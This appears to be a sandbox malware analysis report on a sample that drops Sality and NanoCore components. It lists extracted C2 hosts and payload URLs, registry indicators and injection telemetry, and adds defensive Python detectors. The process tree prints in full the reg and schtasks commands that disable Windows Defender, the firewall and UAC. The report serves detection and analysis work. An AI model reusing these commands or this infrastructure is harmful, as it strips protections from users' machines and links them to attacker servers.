Analysis
max time kernel: 22s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-10-2024 05:08
Static task: static1
Behavioral task: behavioral1
  Sample: 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
  Resource: win7-20240708-en
General
Target: 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
Size: 17.0MB
MD5: 2b66ca254c7c9100343699af457f9d81
SHA1: 36a13e65f57b4ed2f515e752f7ab29b68aa341c7
SHA256: 1fd3e2f6d6e9166cba0086664635f86ba4b4aaf1277a853cf718f6f24d672d6d
SHA512: 4ad6155146eecfcc5f2638772444056ed2c7ebd6867711be66cab87c3156820ce1bb179b96762ae2db3bb98fca16c0daab5e5dc9da294cb3963cd2ba3151ec85
SSDEEP: 393216:UHNOPJo4+k2Br1BMgUD6okK/o4CgMi4GZfT2qZV5:UtOdB2B0gmNkK/Zv4GZPV
Malware Config

Extracted: sality
  http://89.119.67.154/testo5/
  http://kukutrustnet777.info/home.gif
  http://kukutrustnet888.info/home.gif
  http://kukutrustnet987.info/home.gif
  http://www.klkjwre9fqwieluoi.info/
  http://kukutrustnet777888.info/
  http://klkjwre77638dfqwieuoi888.info/

Extracted: nanocore
  version: 1.2.2.0
  C2: hitexe.endofinternet.net:33045
  mutex: f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0
  activate_away_mode: true
  backup_connection_host:
  backup_dns_server: 8.8.4.4
  buffer_size: 65535
  build_time: 2020-12-29T23:08:57.329436536Z
  bypass_user_account_control: true
  bypass_user_account_control_data:
  clear_access_control: true
  clear_zone_identifier: false
  connect_delay: 4000
  connection_port: 33045
  default_group: Default
  enable_debug_mode: true
  gc_threshold: 10485760 (reported as 1.048576e+07)
  keep_alive_timeout: 30000
  keyboard_logging: false
  lan_timeout: 2500
  max_packet_size: 10485760 (reported as 1.048576e+07)
  mutex: f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0
  mutex_timeout: 5000
  prevent_system_sleep: false
  primary_connection_host: hitexe.endofinternet.net
  primary_dns_server: 8.8.8.8
  request_elevation: true
  restart_delay: 5000
  run_delay: 0
  run_on_startup: true
  set_critical_process: true
  timeout_interval: 5000
  use_custom_dns_server: false
  version: 1.2.2.0
  wan_timeout: 8000
Signatures
-
Modifies firewall policy service 3 TTPs 6 IoCs
Process         Description       IoC
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"
UAC bypass 2 IoCs
Process         Description       IoC
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Windows security bypass 12 IoCs
Process         Description       IoC
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"
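The firewall-policy, EnableLUA and Security Center writes listed above are exactly the value-set events a host sensor records, so they make a compact detection exercise. The Python below is an added example, not part of this report and not the sandbox's own signature code: it classifies Sysmon-style "Registry value set" records and names the protection each write removes. The field names Image, TargetObject and Details are Sysmon's; the sample records are constructed from the IoC rows on this page plus one benign control, and the rule table and impact labels are my own.

```python
"""Classify defence-impairment registry writes (added example, not from the report)."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Finding:
    image: str    # process that performed the write
    key: str      # registry key with the value name removed
    value: str    # value name
    data: str     # data normalised to the decimal-string form the report uses
    impact: str   # protection the write removes


# Each rule: (key-tail regex, value names or None for any, data treated as tampering, impact).
# Matching on the key tail lets HKLM\..., \REGISTRY\MACHINE\... and WOW6432Node
# spellings of the same key all hit one rule. Value names are compared lower-cased.
RULES = [
    (r"FirewallPolicy\\(Standard|Domain|Public)Profile$",
     {"enablefirewall", "donotallowexceptions"}, {"0"}, "host firewall weakened"),
    (r"FirewallPolicy\\(Standard|Domain|Public)Profile$",
     {"disablenotifications"}, {"1"}, "firewall notifications silenced"),
    (r"CurrentVersion\\Policies\\System$", {"enablelua"}, {"0"}, "UAC disabled"),
    (r"CurrentVersion\\Policies\\System$",
     {"disableregistrytools", "disabletaskmgr"}, {"1"}, "admin tooling blocked"),
    (r"Microsoft\\Security Center$",
     {"antivirusoverride", "firewalloverride", "antivirusdisablenotify",
      "firewalldisablenotify", "uacdisablenotify", "updatesdisablenotify"},
     {"1"}, "Security Center alerts suppressed"),
    (r"Policies\\Microsoft\\Windows Defender$",
     {"disableantispyware", "disableantivirus"}, {"1"}, "Defender disabled by policy"),
    (r"Windows Defender\\Real-Time Protection$", None, {"1"},
     "Defender real-time protection disabled"),
    (r"Services\\(WinDefend|WdFilter|WdBoot|WdNisDrv|WdNisSvc)$", {"start"}, {"4"},
     "Defender service/driver disabled"),
]

_DWORD = re.compile(r"DWORD\s*\((0x[0-9A-Fa-f]+)\)")


def normalise(details: str) -> str:
    """Sysmon renders DWORD data as 'DWORD (0x00000001)'; the report above shows "1"."""
    m = _DWORD.search(details)
    return str(int(m.group(1), 16)) if m else details.strip().strip('"')


def classify(event: dict) -> Optional[Finding]:
    """Return a Finding when one value-set event matches a tampering rule, else None."""
    key, _, value = event["TargetObject"].rpartition("\\")
    data = normalise(event["Details"])
    for tail, names, bad, impact in RULES:
        if (re.search(tail, key, re.IGNORECASE)
                and (names is None or value.lower() in names)
                and data in bad):
            return Finding(event["Image"], key, value, data, impact)
    return None


def impaired_by_image(events) -> dict:
    """Map each writing process to the sorted list of protections it removed."""
    out = {}
    for ev in events:
        f = classify(ev)
        if f:
            out.setdefault(f.image, set()).add(f.impact)
    return {img: sorted(v) for img, v in out.items()}


# Constructed records; key paths and data mirror the IoC rows in this report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe",
     "TargetObject": r"HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall",
     "Details": "DWORD (0x00000000)"},
    {"Image": r"C:\Users\Admin\AppData\Local\Temp\nb660-full.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    {"Image": r"C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe",
     "TargetObject": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride",
     "Details": "DWORD (0x00000001)"},
    {"Image": r"C:\Windows\system32\reg.exe",
     "TargetObject": r"HKLM\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"Image": r"C:\Windows\system32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\WdFilter\Start",
     "Details": "DWORD (0x00000004)"},
    # benign control: re-enabling the firewall must not fire
    {"Image": r"C:\Windows\system32\svchost.exe",
     "TargetObject": r"HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for image, impacts in impaired_by_image(SAMPLE_EVENTS).items():
        print(image, "->", ", ".join(impacts))
```

The rules key on data as well as path, so the benign re-enable of the firewall in the last record produces nothing; a rule that fired on the key alone would page on every Group Policy refresh. EnableLUA = 0 is worth a separate note in any alert: it does not disable UAC until the next logon, which is why both droppers also set the Security Center override values for immediate effect.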
Disables RegEdit via registry modification 2 IoCs
Process         Description       IoC
MsPlaying.exe   Set value (int)   \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1"
nb660-full.exe  Set value (int)   \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1"
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely a geofence.
Process                                               Description         IoC
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe    Key value queried   \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation
Deletes itself 1 IoCs
PID    Process
3368   MsPlaying.exe

Executes dropped EXE 3 IoCs
PID    Process
3368   MsPlaying.exe
4204   MsfUpdate.exe
1720   nb660-full.exe

Loads dropped DLL 11 IoCs
PID    Process
1720   nb660-full.exe (11 occurrences)
Windows security modification 14 IoCs
Process         Description       IoC
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"
MsPlaying.exe   Key created       \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"
nb660-full.exe  Key created       \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"

Checks whether UAC is enabled 2 IoCs
Process         Description       IoC
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"

UPX-packed memory regions (yara rule: upx) 36 IoCs
Resource                                                                   Yara rule
PID 3368, region 0x00000000021F0000-0x000000000327E000,
  dumps behavioral2/memory/3368-{30,34,35,36,39,40,44,51,59,69,101,102,105,106}-...-memory.dmp   upx (14 matches)
PID 1720, region 0x0000000004FB0000-0x000000000603E000,
  dumps behavioral2/memory/1720-{139,141,142,143,144,145,146,147,148,149,150,151,152,154,155,157,158,160,162,163,164,167}-...-memory.dmp   upx (22 matches)
Drops file in Program Files directory 2 IoCs
Process         Description                    IoC
nb660-full.exe  File opened for modification   C:\PROGRAM FILES\7-ZIP\7z.exe
nb660-full.exe  File opened for modification   C:\PROGRAM FILES\7-ZIP\7zFM.exe

Drops file in Windows directory 1 IoCs
Process         Description                    IoC
MsPlaying.exe   File opened for modification   C:\Windows\SYSTEM.INI
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Process                                               Description   IoC
MsfUpdate.exe                                         Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
MsPlaying.exe                                         Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
nb660-full.exe                                        Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
NSIS installer 2 IoCs
Resource                                   Yara rule
behavioral2/files/0x0007000000023ca2-24.dat   nsis_installer_1
behavioral2/files/0x0007000000023ca2-24.dat   nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Process         Description         IoC
nb660-full.exe  Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
nb660-full.exe  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
PID    Process
3368   MsPlaying.exe (2 occurrences)
1720   nb660-full.exe (4 occurrences)

Suspicious use of AdjustPrivilegeToken 64 IoCs
Description                 PID    Process
Token: SeDebugPrivilege     3368   MsPlaying.exe (64 occurrences)

Suspicious use of SetWindowsHookEx 1 IoCs
PID    Process
3368   MsPlaying.exe
Suspicious use of WriteProcessMemory 64 IoCs
Source PID (image) -> target PIDs; the procid_target index is in parentheses, "xN" marks repeated writes to the same target.
3224 (2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe) -> 3368 x3 (86), 4204 x3 (89), 1720 x3 (90)
3368 (MsPlaying.exe) -> 4932 x3 (91), 792 (8), 796 (9), 64 (13), 2744 (50), 2780 (51), 2992 (52), 3428 (56), 3568 (57), 3748 (58), 3840 (59), 3904 (60), 3988 (61), 4104 (62), 2412 (74), 2284 (76), 4432 (80), 4896 (81), 3224 (82), 1392 (84), 1404 (85), 5024 (88), 4204 x2 (89), 1720 x2 (90)
4932 (cmd.exe) -> 4968 x2 (92), 1428 x2 (93), 1980 x2 (125), 4516 x2 (95), 2000 x2 (96), 2984 x2 (97), 1624 x2 (98), 4448 x2 (99), 1664 x2 (100), 4632 x2 (101), 1144 x2 (102), 1832 x2 (103), 1800 x2 (104), 2276 (105)
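The fan-out above is the telling row: MsPlaying.exe (3368) writes into fontdrvhost.exe, dwm.exe, sihost.exe, svchost.exe, taskhostw.exe, Explorer.EXE and every other process it can open, which is what a process-injection sweep looks like in process-access telemetry. The dropper (3224) and cmd.exe (4932) also appear, but only because creating a process involves writing into the new child. The Python below is an added example, not part of the report: it parses rows in the "PID A wrote to memory of B" form, drops writes from a parent into its own child, and flags sources left with many distinct targets, listing which of them are core system processes. The PARENT and IMAGE maps are constructed from the process tree on this page, the sample rows are a subset of the table above, and the threshold of five is my choice.

```python
"""Flag a process that writes into many processes it did not create (added example)."""
import re
from collections import defaultdict

# Rows in the report's own format: "PID <src> wrote to memory of <dst> <src> <image> <procid_target>"
ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\d+)")

# Images whose address space a user-mode dropper has no legitimate reason to write into.
SYSTEM_IMAGES = {"dwm.exe", "fontdrvhost.exe", "sihost.exe", "svchost.exe",
                 "taskhostw.exe", "explorer.exe", "runtimebroker.exe"}


def parse_rows(text: str):
    """Return (src_pid, src_image, dst_pid) tuples for every row found in text."""
    return [(int(src), img, int(dst)) for src, dst, img, _ in ROW.findall(text)]


def injection_fanout(edges, parent_of: dict, image_of: dict, threshold: int = 5) -> dict:
    """Sources that wrote into >= threshold distinct processes they did not spawn.

    parent_of maps pid -> parent pid; image_of maps pid -> image name. A parent
    writing into a child it has just created is how CreateProcess looks in this
    telemetry, so those edges are excluded before counting.
    """
    targets = defaultdict(set)
    src_image = {}
    for src, img, dst in edges:
        if dst == src or parent_of.get(dst) == src:
            continue
        targets[src].add(dst)
        src_image[src] = img
    report = {}
    for src, tset in targets.items():
        if len(tset) >= threshold:
            sys_hits = sorted(t for t in tset if image_of.get(t, "").lower() in SYSTEM_IMAGES)
            report[src] = {"image": src_image[src],
                           "distinct_targets": len(tset),
                           "system_targets": sys_hits}
    return report


# Constructed sample: a subset of the WriteProcessMemory rows in this report.
SAMPLE_ROWS = """
PID 3224 wrote to memory of 3368 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 86
PID 3224 wrote to memory of 4204 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 89
PID 3224 wrote to memory of 1720 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 90
PID 3368 wrote to memory of 4932 3368 MsPlaying.exe 91
PID 3368 wrote to memory of 792 3368 MsPlaying.exe 8
PID 3368 wrote to memory of 796 3368 MsPlaying.exe 9
PID 3368 wrote to memory of 64 3368 MsPlaying.exe 13
PID 3368 wrote to memory of 2744 3368 MsPlaying.exe 50
PID 3368 wrote to memory of 2780 3368 MsPlaying.exe 51
PID 3368 wrote to memory of 3428 3368 MsPlaying.exe 56
PID 3368 wrote to memory of 3224 3368 MsPlaying.exe 82
PID 4932 wrote to memory of 4968 4932 cmd.exe 92
PID 4932 wrote to memory of 1428 4932 cmd.exe 93
PID 4932 wrote to memory of 4516 4932 cmd.exe 95
PID 4932 wrote to memory of 2000 4932 cmd.exe 96
PID 4932 wrote to memory of 2984 4932 cmd.exe 97
"""

# Parent/child and image maps constructed from the process tree on this page.
PARENT = {3368: 3224, 4204: 3224, 1720: 3224, 4932: 3368,
          4968: 4932, 1428: 4932, 4516: 4932, 2000: 4932, 2984: 4932}
IMAGE = {792: "fontdrvhost.exe", 796: "fontdrvhost.exe", 64: "dwm.exe", 2744: "sihost.exe",
         2780: "svchost.exe", 3428: "Explorer.EXE",
         3224: "2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe"}

if __name__ == "__main__":
    for pid, info in injection_fanout(parse_rows(SAMPLE_ROWS), PARENT, IMAGE).items():
        print(pid, info)
```

Without the parent filter, cmd.exe would be flagged for writing into its five reg.exe children, which is why the parent map matters more than the threshold. On a live host the same logic applies to Sysmon Event ID 10 (ProcessAccess) with write rights, with the parent relationship taken from Event ID 1.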
System policy modification 1 TTPs 2 IoCs
Process         Description       IoC
MsPlaying.exe   Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
nb660-full.exe  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Each line is PID | image path | command line; indentation shows parent/child depth, and the indented "-" items are the signatures that process triggered.

PID 792  | C:\Windows\system32\fontdrvhost.exe | "fontdrvhost.exe"
PID 796  | C:\Windows\system32\fontdrvhost.exe | "fontdrvhost.exe"
PID 64   | C:\Windows\system32\dwm.exe | "dwm.exe"
PID 2744 | C:\Windows\system32\sihost.exe | sihost.exe
PID 2780 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
PID 2992 | C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
PID 3428 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE
  PID 3224 | C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe"
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID 3368 | C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe | "C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"
      - Modifies firewall policy service
      - UAC bypass
      - Windows security bypass
      - Disables RegEdit via registry modification
      - Deletes itself
      - Executes dropped EXE
      - Windows security modification
      - Checks whether UAC is enabled
      - Drops file in Windows directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      - System policy modification
      PID 5024 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID 4932 | C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A46E.tmp\A46F.tmp\A470.bat C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"
        - Suspicious use of WriteProcessMemory
        PID 4968 | C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        PID 1428 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        PID 1980 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        PID 4516 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        PID 2000 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        PID 2984 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        PID 1624 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        PID 4448 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        PID 1664 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        PID 4632 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        PID 1144 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        PID 1832 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        PID 1800 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        PID 2276 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        PID 1804 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        PID 3148 | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        PID 3688 | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        PID 4568 | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        PID 3664 | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        PID 532  | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        PID 736  | C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        PID 1960 | C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        PID 3628 | C:\Windows\system32\reg.exe | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        PID 3496 | C:\Windows\system32\reg.exe | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        PID 2680 | C:\Windows\system32\reg.exe | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        PID 3936 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        PID 2392 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        PID 708  | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        PID 4856 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        PID 4080 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    PID 4204 | C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe | "C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID 3340 | C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eRuAlzO" /XML "C:\Users\Admin\AppData\Local\Temp\tmp269E.tmp"
        - Scheduled Task/Job: Scheduled Task
        PID 1804 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID 1396 | C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe | "{path}"
    PID 1720 | C:\Users\Admin\AppData\Local\Temp\nb660-full.exe | "C:\Users\Admin\AppData\Local\Temp\nb660-full.exe"
      - Modifies firewall policy service
      - UAC bypass
      - Windows security bypass
      - Disables RegEdit via registry modification
      - Executes dropped EXE
      - Loads dropped DLL
      - Windows security modification
      - Checks whether UAC is enabled
      - Drops file in Program Files directory
      - System Location Discovery: System Language Discovery
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - System policy modification
PID 3568 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
PID 3748 | C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
